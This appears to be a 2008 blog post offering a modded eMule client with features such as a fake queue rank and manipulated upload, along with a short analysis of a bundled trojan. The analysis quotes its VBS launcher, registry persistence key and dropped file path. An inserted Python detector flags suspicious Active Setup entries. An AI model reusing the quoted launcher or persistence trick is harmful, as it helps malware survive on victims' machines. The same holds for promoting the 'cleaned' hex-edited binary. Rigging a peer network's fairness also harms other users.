09 July 2008

eMule 0.48a Final Fight Gold [Clean]

eMule v0.48a Final Fight Gold
0.48a eMule Final Fight Gold (5) based on Sivka 0.48a v18a1-alpha

Modded by Ruffy
15-May-2008

-Fake Rank
-Queue size changed
-Max queue rank on download increased
-Upload slot count can be changed
-Upload manipulated (it can be set to 1 without affecting the download speed)
-Remove Ratio
-Remove Wizard
-Remove Help
-Added new Icons


Code analysis:
Agent.ECJH
Malware dropped to: Documents and Settings\YourWindowsLogonName\Application Data\Microsoft\spoolsv.exe
and
cfgmgr.vbs
with content:
    Set WshShell = WScript.CreateObject("WScript.Shell")
    WshShell.Run Chr(34) & "C:\Documents and Settings\Nata...\Application Data\Microsoft\spoolsv.exe" & Chr(34)
and added the registry entry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{6778F1EE-80BB-4F27-BC69-F91B843782CD}

Result: still not reported clean, but the virus is probably eliminated and can no longer start or spread.
http://www.virustotal.com/analisis/dde25155980c21598c035c52581fc250

I found: HKEY_CURRENT_USER\Software\Microsoft\Active Setup\Installed Components\{6778F1EE-80BB-4F27-BC69-F91B843782CD}
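One way to hunt for this persistence mechanism on a suspect machine, as an added example rather than anything from the post: export the Active Setup keys with `reg export` and scan the file for stubs that are script hosts, live outside Windows or Program Files, or carry the GUID named above. The embedded sample export is constructed, and the allow-list of trusted paths is an assumption to tune per site.

```python
"""Added example (not from the post): flag Active Setup persistence in a .reg export.
Installed Components stubs run once per user at logon, which is how the GUID
subkey above relaunched the dropped spoolsv.exe."""
import re

# Constructed `reg export` sample; the GUID and cfgmgr.vbs names follow the post.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}]
"StubPath"="C:\\WINDOWS\\system32\\ie4uinit.exe -UserConfig"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{6778F1EE-80BB-4F27-BC69-F91B843782CD}]
"StubPath"="wscript.exe \"C:\\Documents and Settings\\user\\Application Data\\Microsoft\\cfgmgr.vbs\""
"""
ACTIVE_SETUP = "\\microsoft\\active setup\\installed components\\"
KNOWN_BAD_GUIDS = {"{6778F1EE-80BB-4F27-BC69-F91B843782CD}"}  # GUID from the post
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\")  # assumed allow-list; tune per site
SUSPICIOUS_HOSTS = ("wscript", "cscript", "mshta", "powershell", "cmd")

def parse_stubpaths(reg_text):
    """Yield (key, unescaped StubPath) for every Active Setup component in the export."""
    key = None
    for line in reg_text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        elif key and ACTIVE_SETUP in key.lower():
            m = re.match(r'"StubPath"="(.*)"$', line)
            if m:  # .reg files escape backslashes and quotes with a backslash
                yield key, re.sub(r"\\(.)", r"\1", m.group(1))

def assess_stub(stub):
    """Reasons a StubPath looks like persistence abuse (empty list = looks benign)."""
    exe = (stub.split('"')[1] if stub.startswith('"') else stub.split(" ", 1)[0]).lower()
    host = exe.rsplit("\\", 1)[-1].split(".")[0]
    checks = [
        (host in SUSPICIOUS_HOSTS, "script host used as stub: " + host),
        ("\\" in exe and not exe.startswith(TRUSTED_PREFIXES), "stub outside trusted locations: " + exe),
        ("application data" in stub.lower() or "\\appdata\\" in stub.lower(), "runs content from a per-user profile directory"),
    ]
    return [why for hit, why in checks if hit]

def find_suspicious(reg_text):
    """Return [(key, stub, reasons)] for each Active Setup stub that trips a check."""
    findings = []
    for key, stub in parse_stubpaths(reg_text):
        reasons = assess_stub(stub)
        if key.rsplit("\\", 1)[-1].upper() in KNOWN_BAD_GUIDS:
            reasons.append("component GUID matches the indicator in the post")
        if reasons:
            findings.append((key, stub, reasons))
    return findings
```

Run it against exports of both HKLM and HKCU, since the post found the same GUID under HKEY_CURRENT_USER as well.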

Download: IT SHOULD BE CLEAN NOW OR THE TROJAN IS NOW DESTROYED
eMule 0.48a Final Fight Gold -clean.zip
2.72 MB - Hexedited

4 comments:

Anonymous said...

Kaspersky 2009, Spybot, A-Squared:
nothing found...
I didn't find the reg key.
Sorry for my English :-((

Recon said...

Don't know; most C++ binaries with code not attached, or things done with a binder, are not shown in most AVs.
Almost all eMules before were found inside the exe with VBA32
http://vba32.de/demo/content/view/15/31/
maybe because of:
http://en.wikipedia.org/wiki/Vba32_AntiVirus
the advantages of this AV:
- Usage of the “Delta-patch” technology
- Heuristic analyzer and the MalwareScope virus-recognition technology, which considerably improve the efficiency of detecting new malicious programs
- Dynamic code translation processor emulator effectively handles complex polymorphic viruses, packers and cryptors
... and many more

Scan of bulk exes done with VC++ using
Virus Block Ada 32
http://vba32.de/anonymous/pub/Vba32Scan.zip

Recon said...

newer version here:
ftp://anti-virus.by/pub/Vba32Scan.zip

scanner only

Anonymous said...

It's really clean now. Tested in sandbox and vp
